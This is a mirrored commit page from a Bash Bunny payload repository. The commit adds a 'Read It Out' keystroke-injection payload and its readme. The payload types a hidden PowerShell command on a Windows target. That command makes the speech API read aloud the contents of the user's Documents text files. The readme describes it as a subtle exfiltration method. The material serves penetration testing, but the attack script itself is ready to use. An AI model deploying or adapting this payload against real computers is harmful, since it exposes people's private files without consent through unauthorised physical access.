hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

New Payload - Read It Out (#444)

Browse Source
This commit is contained in:
cribb-it
2021-12-21 23:28:38 +00:00
committed by GitHub
parent 5d4367787f
commit 8a7606aa0a
2 changed files with 49 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

22
payloads/library/exfiltration/Win_PoSH_ReadItOut/payload.txt Normal file
View File

@@ -0,0 +1,22 @@
# Title: Read It Out
# Description: Gets the Microsoft Speech API (SAPI) to read out the content of text files in the MyDocuments directory.
# Author: Cribbit
# Version: 1.0
# Category: Exfiltration
# Target: Windows (Powershell 5.1+)
# Attackmodes: HID
# Extensions: Run
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID
QUACK DELAY 500
LED ATTACK
RUN WIN "powershell -Noni -NoP -W h -C \"& {\$s=New-Object -ComObject SAPI.SPVoice; gci([Environment]::GetFolderPath('MyDocuments')) -file *.txt | % {\$s.Speak(\$(gc(\$_.FullName)))}}\""
LED FINISH

27
payloads/library/exfiltration/Win_PoSH_ReadItOut/readme.md Normal file
View File

@@ -0,0 +1,27 @@
# Read It Out
- Author: Cribbit
- Version: 1.0
- Target: Windows 10 (Powershell 5.1+)
- Category: Exfiltration
- Attackmode: HID
- Extensions: Run
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Super subtle exfiltration method.
Gets the Microsoft Speech API (SAPI) to read out the content of text files in the MyDocuments directory.
## Config
Add -r to do subdirectorys
## Colours
| Status | Colour | Description |
| ------ | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISH | Green blink followed by SOLID | Script is finished |